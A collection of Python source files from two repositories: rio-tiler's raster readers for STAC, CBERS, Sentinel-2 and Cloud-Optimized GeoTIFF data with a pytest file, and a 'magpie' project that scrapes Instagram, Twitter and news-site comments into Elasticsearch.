|
tests/test_io_stac.py
|
<filename>tests/test_io_stac.py
"""tests rio_tiler.io.stac"""
import json
import os
import pytest
import rasterio
from mock import patch
from rio_tiler.errors import InvalidBandName, TileOutsideBounds
PREFIX = os.path.join(os.path.dirname(__file__), "fixtures")
with open(os.path.join(PREFIX, "stac.json")) as f:
stac_item = json.loads(f.read())
def mock_rasterio_open(asset):
"""Mock rasterio Open."""
assert asset.startswith("http://somewhere-over-the-rainbow.io")
asset = asset.replace("http://somewhere-over-the-rainbow.io", PREFIX)
return rasterio.open(asset)
@pytest.fixture(autouse=True)
def app(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
from rio_tiler.io import stac
return stac
def test_spatial_info_valid(app):
"""Should raise an exception."""
with pytest.raises(Exception):
app.spatial_info(stac_item)
def test_bounds_valid(app):
"""Should work as expected (get bounds)"""
meta = app.bounds(stac_item)
assert meta["id"] == stac_item["id"]
assert len(meta["bounds"]) == 4
@patch("rio_tiler.reader.rasterio")
def test_metadata_valid(rio, app):
"""Get bounds and get stats for all bands."""
rio.open = mock_rasterio_open
with pytest.raises(InvalidBandName):
app.metadata(stac_item, "vert")
meta = app.metadata(stac_item, "green")
assert meta["id"] == stac_item["id"]
assert len(meta["bounds"]) == 4
assert meta["band_descriptions"][0] == (1, "green")
assert len(meta["statistics"].items()) == 1
assert meta["nodata_types"] == {"green": "Nodata"}
assert meta["dtypes"] == {"green": "uint16"}
meta = app.metadata(stac_item, ["green", "red", "blue"])
assert meta["id"] == stac_item["id"]
assert len(meta["bounds"]) == 4
assert meta["band_descriptions"] == [(1, "green"), (2, "red"), (3, "blue")]
assert len(meta["statistics"].items()) == 3
assert meta["nodata_types"] == {
"green": "Nodata",
"red": "Nodata",
"blue": "Nodata",
}
@patch("rio_tiler.reader.rasterio")
def test_tile_valid(rio, app):
"""Should raise or return tiles."""
rio.open = mock_rasterio_open
with pytest.raises(TileOutsideBounds):
app.tile(stac_item, "green", 701, 102, 8)
data, mask = app.tile(stac_item, "green", 71, 102, 8)
assert data.shape == (1, 256, 256)
assert mask.shape == (256, 256)
|
mvmendes/rio-tiler
|
rio_tiler/io/stac.py
|
"""rio_tiler.io.stac: STAC reader."""
from typing import Any, Dict, Sequence, Tuple
import numpy
from rio_tiler import reader
from rio_tiler.errors import InvalidBandName, TileOutsideBounds
from rio_tiler.utils import tile_exists
def _get_href(stac: Dict, assets: Sequence[str]) -> Sequence[str]:
"""Validate asset names and return asset's url."""
_assets = list(stac["assets"].keys())
for asset in assets:
if asset not in _assets:
raise InvalidBandName(f"{asset} is not a valid asset name.")
return [stac["assets"][asset]["href"] for asset in assets]
def spatial_info(stac: Dict) -> Dict:
"""
Return STAC spatial info.
Attributes
----------
stac : dict
STAC item.
Returns
-------
out : dict.
"""
raise Exception("Not implemented")
def bounds(stac: Dict) -> Dict:
"""
Return STAC bounds.
Attributes
----------
stac : dict
STAC item.
Returns
-------
out : dict
dictionary with image bounds.
"""
return dict(id=stac["id"], bounds=stac["bbox"])
def metadata(
stac: Dict,
assets: Sequence[str],
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Return STAC assets statistics.
Attributes
----------
stac : dict
STAC item.
assets : list
Asset names.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
if isinstance(assets, str):
assets = (assets,)
assets_url = _get_href(stac, assets)
responses = reader.multi_metadata(
assets_url, percentiles=(pmin, pmax), hist_options=hist_options, **kwargs
)
info: Dict[str, Any] = dict(id=stac["id"])
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(assets)]
info["bounds"] = stac["bbox"]
info["statistics"] = {b: d["statistics"][1] for b, d in zip(assets, responses)}
info["dtypes"] = {b: d["dtype"] for b, d in zip(assets, responses)}
info["nodata_types"] = {b: d["nodata_type"] for b, d in zip(assets, responses)}
return info
def tile(
stac: Dict,
assets: Sequence[str],
tile_x: int,
tile_y: int,
tile_z: int,
tilesize: int = 256,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from any images.
Attributes
----------
stac : dict
STAC item.
assets : list
Asset names.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
tilesize : int, optional (default: 256)
Output image size.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(assets, str):
assets = (assets,)
if not tile_exists(stac["bbox"], tile_z, tile_x, tile_y):
raise TileOutsideBounds(
f"Tile {tile_z}/{tile_x}/{tile_y} is outside item bounds"
)
assets_url = _get_href(stac, assets)
return reader.multi_tile(assets_url, tile_x, tile_y, tile_z, **kwargs)
|
mvmendes/rio-tiler
|
rio_tiler/io/cbers.py
|
"""rio_tiler.cbers: cbers processing."""
import re
from typing import Any, Dict, Sequence, Tuple, Union
import numpy
import rasterio
from rasterio.warp import transform_bounds
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidCBERSSceneId, TileOutsideBounds
from rio_tiler.utils import tile_exists
def cbers_parser(sceneid: str) -> Dict:
"""Parse CBERS scene id.
Attributes
----------
sceneid : str
CBERS sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
if not re.match(r"^CBERS_4_\w+_[0-9]{8}_[0-9]{3}_[0-9]{3}_L[0-9]$", sceneid):
raise InvalidCBERSSceneId("Could not match {}".format(sceneid))
cbers_pattern = (
r"(?P<satellite>\w+)_"
r"(?P<mission>[0-9]{1})"
r"_"
r"(?P<instrument>\w+)"
r"_"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionMonth>[0-9]{2})"
r"(?P<acquisitionDay>[0-9]{2})"
r"_"
r"(?P<path>[0-9]{3})"
r"_"
r"(?P<row>[0-9]{3})"
r"_"
r"(?P<processingCorrectionLevel>L[0-9]{1})$"
)
meta: Dict[str, Any] = re.match(cbers_pattern, sceneid, re.IGNORECASE).groupdict()
meta["scene"] = sceneid
instrument = meta["instrument"]
instrument_params = {
"MUX": {
"reference_band": "6",
"bands": ("5", "6", "7", "8"),
"rgb": ("7", "6", "5"),
},
"AWFI": {
"reference_band": "14",
"bands": ("13", "14", "15", "16"),
"rgb": ("15", "14", "13"),
},
"PAN10M": {
"reference_band": "4",
"bands": ("2", "3", "4"),
"rgb": ("3", "4", "2"),
},
"PAN5M": {"reference_band": "1", "bands": ("1"), "rgb": ("1", "1", "1")},
}
meta["reference_band"] = instrument_params[instrument]["reference_band"]
meta["bands"] = instrument_params[instrument]["bands"]
meta["rgb"] = instrument_params[instrument]["rgb"]
meta["scheme"] = "s3"
meta["bucket"] = "cbers-pds"
meta["prefix"] = "CBERS4/{instrument}/{path}/{row}/{scene}".format(**meta)
return meta
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
CBERS sceneid.
Returns
-------
out : dict
dictionary with image bounds.
"""
scene_params = cbers_parser(sceneid)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
with rasterio.open(
"{}_BAND{}.tif".format(cbers_prefix, scene_params["reference_band"])
) as src:
bounds = transform_bounds(
src.crs, constants.WGS84_CRS, *src.bounds, densify_pts=21
)
return dict(sceneid=sceneid, bounds=bounds)
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Return band bounds and statistics.
Attributes
----------
sceneid : str
CBERS sceneid.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with bounds and bands statistics.
"""
scene_params = cbers_parser(sceneid)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
bands = scene_params["bands"]
addresses = [f"{cbers_prefix}_BAND{band}.tif" for band in bands]
responses = reader.multi_metadata(
addresses,
indexes=[1],
nodata=0,
percentiles=(pmin, pmax),
hist_options=hist_options,
**kwargs,
)
info: Dict[str, Any] = dict(sceneid=sceneid)
info["instrument"] = scene_params["instrument"]
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(bands)]
info["bounds"] = [
r["bounds"]
for b, r in zip(bands, responses)
if b == scene_params["reference_band"]
][0]
info["statistics"] = {b: d["statistics"][1] for b, d in zip(bands, responses)}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = None,
tilesize: int = 256,
**kwargs: Dict,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from CBERS data.
Attributes
----------
sceneid : str
CBERS sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple or list or str, optional
Bands index for the RGB combination. If None uses default
defined for the instrument
tilesize : int, optional
Output image size. Default is 256
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
scene_params = cbers_parser(sceneid)
if not bands:
bands = scene_params["rgb"]
for band in bands:
if band not in scene_params["bands"]:
raise InvalidBandName(
"{} is not a valid band name for {} CBERS instrument".format(
band, scene_params["instrument"]
)
)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
with rasterio.open(
"{}_BAND{}.tif".format(cbers_prefix, scene_params["reference_band"])
) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
addresses = [f"{cbers_prefix}_BAND{band}.tif" for band in bands]
return reader.multi_tile(
addresses, tile_x, tile_y, tile_z, tilesize=tilesize, nodata=0
)
def tile_pansharpen(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = None,
tilesize: int = 256,
**kwargs: Dict,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from CBERS data.
Attributes
----------
sceneid : str
CBERS sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple or list or str, optional
Bands index for the RGB combination. If None uses default
defined for the instrument
tilesize : int, optional
Output image size. Default is 256
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
scene_params = cbers_parser(sceneid)
if not bands:
bands = scene_params["rgb"]
for band in bands:
if band not in scene_params["bands"]:
raise InvalidBandName(
"{} is not a valid band name for {} CBERS instrument".format(
band, scene_params["instrument"]
)
)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
with rasterio.open(
"{}_BAND{}.tif".format(cbers_prefix, scene_params["reference_band"])
) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
pan5m = cbers_prefix.replace("PAN10","PAN5")
pan10m = cbers_prefix.replace("PAN5","PAN10")
addresses = [f"{pan10m}_BAND{band}.tif" for band in bands]
addresses.insert(0,"{}_BAND1.tif".format(pan5m))
del addresses[-1]
return reader.multi_tile(
addresses, tile_x, tile_y, tile_z, tilesize=tilesize, nodata=0
)
|
mvmendes/rio-tiler
|
rio_tiler/io/sentinel2.py
|
"""rio_tiler.reader.sentinel2: Sentinel-2 processing."""
import itertools
import os
import re
from collections import OrderedDict
from typing import Any, Dict, Sequence, Tuple, Union
import numpy
import rasterio
from rasterio.warp import transform_bounds
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidSentinelSceneId, TileOutsideBounds
from rio_tiler.utils import tile_exists
SENTINEL_L1_BANDS = OrderedDict(
[
("10", ["02", "03", "04", "08"]),
("20", ["05", "06", "07", "11", "12", "8A"]),
("60", ["01", "09", "10"]),
]
)
SENTINEL_L2_BANDS = OrderedDict(
[
("10", ["02", "03", "04", "08"]),
("20", ["02", "03", "04", "05", "06", "07", "08", "11", "12", "8A"]),
(
"60",
["01", "02", "03", "04", "05", "06", "07", "08", "09", "11", "12", "8A"],
),
]
)
SENTINEL_L2_PRODUCTS = OrderedDict(
[
("10", ["AOT", "WVP"]),
("20", ["AOT", "SCL", "WVP"]),
("60", ["AOT", "SCL", "WVP"]),
]
)
def sentinel2_parser(sceneid: str) -> Dict:
"""
Parse Sentinel-2 scene id.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
if not re.match("^S2[AB]_L[0-2][A-C]_[0-9]{8}_[0-9]{2}[A-Z]{3}_[0-9]$", sceneid):
raise InvalidSentinelSceneId("Could not match {}".format(sceneid))
sentinel_pattern = (
r"^S"
r"(?P<sensor>\w{1})"
r"(?P<satellite>[AB]{1})"
r"_"
r"(?P<processingLevel>L[0-2][ABC])"
r"_"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionMonth>[0-9]{2})"
r"(?P<acquisitionDay>[0-9]{2})"
r"_"
r"(?P<utm>[0-9]{2})"
r"(?P<lat>\w{1})"
r"(?P<sq>\w{2})"
r"_"
r"(?P<num>[0-9]{1})$"
)
meta: Dict[str, Any] = re.match(
sentinel_pattern, sceneid, re.IGNORECASE
).groupdict()
meta["scene"] = sceneid
utm_zone = meta["utm"].lstrip("0")
grid_square = meta["sq"]
latitude_band = meta["lat"]
year = meta["acquisitionYear"]
month = meta["acquisitionMonth"].lstrip("0")
day = meta["acquisitionDay"].lstrip("0")
img_num = meta["num"]
meta["scheme"] = "s3"
meta["bucket"] = "sentinel-s2-" + meta["processingLevel"].lower()
meta["prefix"] = os.path.join(
"tiles", utm_zone, latitude_band, grid_square, year, month, day, img_num
)
if meta["processingLevel"] == "L1C":
meta["preview_file"] = "preview.jp2"
meta["preview_prefix"] = ""
meta["bands"] = list(
itertools.chain.from_iterable(
[bands for _, bands in SENTINEL_L1_BANDS.items()]
)
)
meta["valid_bands"] = meta["bands"]
else:
meta["preview_file"] = "R60m/TCI.jp2"
meta["preview_prefix"] = "R60m"
meta["bands"] = SENTINEL_L2_BANDS["60"]
meta["valid_bands"] = meta["bands"] + SENTINEL_L2_PRODUCTS["60"]
return meta
def _l2_prefixed_band(band: str) -> str:
"""Return L2A prefixed bands name."""
if band in SENTINEL_L2_BANDS["60"]:
for res, bands in SENTINEL_L2_BANDS.items():
if band in bands:
return "R{}m/B{}".format(res, band)
elif band in SENTINEL_L2_PRODUCTS["60"]:
for res, bands in SENTINEL_L2_PRODUCTS.items():
if band in bands:
return "R{}m/{}".format(res, band)
raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
Returns
-------
out : dict
dictionary with image bounds.
"""
scene_params = sentinel2_parser(sceneid)
preview_file = "{scheme}://{bucket}/{prefix}/{preview_file}".format(**scene_params)
with rasterio.open(preview_file) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
return dict(sceneid=sceneid, bounds=bounds)
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Retrieve image bounds and band statistics.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
pmin : float, optional, (default: 2.)
Histogram minimum cut.
pmax : float, optional, (default: 98.)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
scene_params = sentinel2_parser(sceneid)
sentinel_prefix = "{scheme}://{bucket}/{prefix}/{preview_prefix}".format(
**scene_params
)
bands = scene_params["bands"]
addresses = [f"{sentinel_prefix}/B{band}.jp2" for band in bands]
responses = reader.multi_metadata(
addresses,
indexes=[1],
nodata=0,
percentiles=(pmin, pmax),
hist_options=hist_options,
**kwargs,
)
info: Dict[str, Any] = dict(sceneid=sceneid)
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(bands)]
info["bounds"] = responses[0]["bounds"]
info["statistics"] = {
b: v for b, d in zip(bands, responses) for k, v in d["statistics"].items()
}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = ("04", "03", "02"),
tilesize: int = 256,
**kwargs: Dict,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from Sentinel-2 data.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple, str, optional (default: ('04', '03', '02'))
Bands index for the RGB combination.
tilesize : int, optional (default: 256)
Output image size.
kwargs: dict, optional
These will be passed to the 'rio_tiler.utils._tile_read' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
scene_params = sentinel2_parser(sceneid)
for band in bands:
if band not in scene_params["valid_bands"]:
raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
sentinel_prefix = "{scheme}://{bucket}/{prefix}".format(**scene_params)
preview_file = os.path.join(sentinel_prefix, scene_params["preview_file"])
with rasterio.open(preview_file) as src:
bounds = transform_bounds(
src.crs, constants.WGS84_CRS, *src.bounds, densify_pts=21
)
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
if scene_params["processingLevel"] == "L2A":
bands = [_l2_prefixed_band(b) for b in bands]
else:
bands = ["B{}".format(b) for b in bands]
addresses = [f"{sentinel_prefix}/{band}.jp2" for band in bands]
return reader.multi_tile(
addresses, tile_x, tile_y, tile_z, tilesize=tilesize, nodata=0
)
|
mvmendes/rio-tiler
|
rio_tiler/io/cogeo.py
|
"""rio_tiler.io.cogeo: raster processing."""
from typing import Any, Dict, List, Optional, Tuple
import numpy
import rasterio
from rasterio.crs import CRS
from rasterio.warp import transform_bounds
from rio_tiler import constants, reader
from rio_tiler.mercator import get_zooms
from rio_tiler.utils import has_alpha_band, has_mask_band
def spatial_info(address: str) -> Dict:
"""
Return COGEO spatial info.
Attributes
----------
address : str or PathLike object
A dataset path or URL. Will be opened in "r" mode.
Returns
-------
out : dict.
"""
with rasterio.open(address) as src_dst:
minzoom, maxzoom = get_zooms(src_dst)
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
center = [(bounds[0] + bounds[2]) / 2, (bounds[1] + bounds[3]) / 2, minzoom]
return dict(
address=address, bounds=bounds, center=center, minzoom=minzoom, maxzoom=maxzoom
)
def bounds(address: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
address : str
file url.
Returns
-------
out : dict
dictionary with image bounds.
"""
with rasterio.open(address) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
return dict(address=address, bounds=bounds)
def metadata(
address: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Return image statistics.
Attributes
----------
address : str or PathLike object
A dataset path or URL. Will be opened in "r" mode.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
with rasterio.open(address) as src_dst:
meta = reader.metadata(
src_dst, percentiles=(pmin, pmax), hist_options=hist_options, **kwargs
)
return dict(address=address, **meta)
def info(address: str) -> Dict:
"""
Return simple metadata about the file.
Attributes
----------
address : str or PathLike object
A dataset path or URL. Will be opened in "r" mode.
Returns
-------
out : dict.
"""
with rasterio.open(address) as src_dst:
minzoom, maxzoom = get_zooms(src_dst)
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
center = [(bounds[0] + bounds[2]) / 2, (bounds[1] + bounds[3]) / 2, minzoom]
def _get_descr(ix):
"""Return band description."""
name = src_dst.descriptions[ix - 1]
if not name:
name = "band{}".format(ix)
return name
band_descriptions = [(ix, _get_descr(ix)) for ix in src_dst.indexes]
tags = [(ix, src_dst.tags(ix)) for ix in src_dst.indexes]
other_meta = dict()
if src_dst.scales[0] and src_dst.offsets[0]:
other_meta.update(dict(scale=src_dst.scales[0]))
other_meta.update(dict(offset=src_dst.offsets[0]))
if has_alpha_band(src_dst):
nodata_type = "Alpha"
elif has_mask_band(src_dst):
nodata_type = "Mask"
elif src_dst.nodata is not None:
nodata_type = "Nodata"
else:
nodata_type = "None"
try:
cmap = src_dst.colormap(1)
other_meta.update(dict(colormap=cmap))
except ValueError:
pass
return dict(
address=address,
bounds=bounds,
center=center,
minzoom=minzoom,
maxzoom=maxzoom,
band_metadata=tags,
band_descriptions=band_descriptions,
dtype=src_dst.meta["dtype"],
colorinterp=[src_dst.colorinterp[ix - 1].name for ix in src_dst.indexes],
nodata_type=nodata_type,
**other_meta,
)
def tile(
address: str,
tile_x: int,
tile_y: int,
tile_z: int,
tilesize: int = 256,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from any images.
Attributes
----------
address : str
file url.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
tilesize : int, optional (default: 256)
Output image size.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
with rasterio.open(address) as src_dst:
return reader.tile(src_dst, tile_x, tile_y, tile_z, tilesize, **kwargs)
def preview(address: str, **kwargs: Any,) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Return small version of a raster.
Attributes
----------
address: str
file url.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.preview' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
with rasterio.open(address) as src_dst:
return reader.preview(src_dst, **kwargs)
def point(address: str, lon: float, lat: float, **kwargs: Any) -> List:
"""
Read point value from a file.
Attributes
----------
address: str
file url.
lon: float
Longitude
lat: float
Latittude.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.point' function.
Returns
-------
point: list
List of pixel values per bands indexes.
"""
with rasterio.open(address) as src_dst:
return reader.point(src_dst, (lon, lat), **kwargs)
def area(
address: str,
bbox: Tuple[float, float, float, float],
dst_crs: Optional[CRS] = None,
bounds_crs: CRS = constants.WGS84_CRS,
max_size: int = 1024,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Read value from a bbox.
Attributes
----------
address: str
file url.
bbox: tuple
bounds to read (left, bottom, right, top) in "bounds_crs".
dst_crs: CRS or str, optional
Target coordinate reference system, default is the dataset CRS.
bounds_crs: CRS or str, optional
bounds coordinate reference system, default is "epsg:4326"
max_size: int, optional
Limit output size array, default is 1024.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.part' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
with rasterio.open(address) as src_dst:
if not dst_crs:
dst_crs = src_dst.crs
return reader.part(
src_dst,
bbox,
max_size=max_size,
bounds_crs=bounds_crs,
dst_crs=dst_crs,
**kwargs,
)
|
Xepp/magpie
|
app/process/instagram_comment_process.py
|
<reponame>Xepp/magpie
import os
import time
from app.adapter.elasticsearch import ElasticsearchAdapter
from app.adapter.instagram import InstagramWebAdapter
from app.util.enumeration import SourceType
from app.util.helper import normalize_text
class InstagramCommentProcess:
def __init__(self):
self.ig_adapter = InstagramWebAdapter()
self.es_adapter = ElasticsearchAdapter()
def run(self, shortcode):
end_cursor = None
has_more = True
while has_more:
try:
print(f'End Cursor: {end_cursor}')
comments, end_cursor, has_more = self.ig_adapter.get_media_comments(
shortcode=shortcode,
end_cursor=end_cursor
)
for comment in comments:
comment_id = comment.get('id')
text = comment.get('text')
content = normalize_text(text)
elastic_id = f'instagram://{shortcode}/{comment_id}'
res = self.es_adapter.insert_doc(
index=os.getenv('ELASTIC_INDEX'),
elastic_id=elastic_id,
source=SourceType.INSTAGRAM.value,
content=content
)
result = res.get('result')
print(f'{result} {elastic_id}')
except Exception as exc:
if "HTTPError" not in str(exc):
raise exc
print(f'Sleeping for 60 sec. {exc}')
time.sleep(60)
|
Xepp/magpie
|
app/util/helper.py
|
<reponame>Xepp/magpie<filename>app/util/helper.py
import re
import string
import random
def get_tweet_type(tweet):
if 'retweeted_status' in tweet:
return 'retweet'
elif 'quoted_status' in tweet:
return 'quote'
elif tweet.get('in_reply_to_status_id') is not None:
return 'reply'
return 'tweet'
def get_news_id(url):
try:
id = re.findall('detail/(.+)/', url)[0]
except Exception:
id = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
return id
def normalize_text(text):
return re.sub(r"(?:\@|https?\://)\S+", "", text).strip()
|
Xepp/magpie
|
app/adapter/twitter.py
|
<gh_stars>0
import os
from tweepy import StreamListener
from app.adapter.elasticsearch import ElasticsearchAdapter
from app.util.enumeration import SourceType
from app.util.helper import get_tweet_type
from app.util.helper import normalize_text
class TwitterStreamListener(StreamListener):
def __init__(self):
super().__init__()
self.es_adapter = ElasticsearchAdapter()
def on_status(self, status):
tweet = getattr(status, '_json')
tweet_type = get_tweet_type(tweet)
if tweet_type in ['tweet', 'reply']:
text = tweet.get('extended_tweet', {}).get('full_text', tweet.get('text', ''))
content = normalize_text(text)
tweet_id = tweet.get('id')
elastic_id = f'twitter://{tweet_id}'
res = self.es_adapter.insert_doc(
index=os.getenv('ELASTIC_INDEX'),
elastic_id=elastic_id,
source=SourceType.TWITTER.value,
content=content
)
result = res.get('result')
print(f'{result} {elastic_id}')
|
Xepp/magpie
|
app/vo/__init__.py
|
<reponame>Xepp/magpie
from app.vo.elasticsearch import ElasticsearchDocVO
__all__ = [
ElasticsearchDocVO
]
|
Xepp/magpie
|
app/adapter/web.py
|
<reponame>Xepp/magpie
import re
import requests
from bs4 import BeautifulSoup
class KhabarFooriAdapter:
def parse_comment(self, tag):
head = tag.find('div', { 'class': 'head' })
body = tag.find('div', { 'class': 'body' })
author = head.find('span', { 'class': 'pull-right' }).text
info = head.find_all('span', { 'class': 'pull-left' })
text = body.p.text
date = re.sub('-', '', info[-1].text)
date = re.sub('\n', '', date)
date = re.sub(' +', ' ', date)
pos = info[0].text if len(info) == 4 else '-'
neg = info[1].text if len(info) == 4 else '-'
return {
'author': author,
'date': date,
'text': text,
'pos': pos,
'neg': neg,
'replays': []
}
def get_page_comments(self, url):
content = requests.get(url)
soup = BeautifulSoup(content.text, 'html.parser')
result = []
comments = soup.find('div', { 'class': 'comments-content' })
rows = comments.find_all('div', { 'class': 'comment' })
for row in rows:
if 'comment-replay' in row.attrs['class']:
continue
comment = self.parse_comment(row)
replays = row.find_all('div', { 'class': 'comment-replay' })
for replay in replays:
comment['replays'].append(self.parse_comment(replay))
result.append(comment)
return result
|
Xepp/magpie
|
app/process/web_comment_process.py
|
import os
import time
from app.adapter.elasticsearch import ElasticsearchAdapter
from app.adapter.web import KhabarFooriAdapter
from app.util.enumeration import SourceType
from app.util.helper import get_news_id
class KhabarFooriCommentProcess:
def __init__(self):
self.web_adapter = KhabarFooriAdapter()
self.es_adapter = ElasticsearchAdapter()
def run(self, url):
comments = self.web_adapter.get_page_comments(url)
news_id = get_news_id(url)
for comment in comments:
author = comment.get('author')
date = comment.get('date')
content = comment.get('text')
elastic_id = f'web://{news_id}/{author}/{date}'
res = self.es_adapter.insert_doc(
index=os.getenv('ELASTIC_INDEX'),
elastic_id=elastic_id,
source=SourceType.WEB.value,
content=content
)
result = res.get('result')
print(f'{result} {elastic_id}')
|
Xepp/magpie
|
app/util/enumeration.py
|
from enum import Enum
class BaseEnum(Enum):
@classmethod
def list(cls):
return list(map(lambda c: c.value, cls))
class SentimentType(BaseEnum):
POS = 'pos'
NEG = 'neg'
NEU = 'neu'
UNK = 'unk'
class SourceType(BaseEnum):
TWITTER = 'twitter'
INSTAGRAM = 'instagram'
WEB = 'web'
|
Xepp/magpie
|
app/adapter/elasticsearch.py
|
from datetime import datetime
from elasticsearch import Elasticsearch
from app.vo import ElasticsearchDocVO
from app.util.enumeration import SentimentType
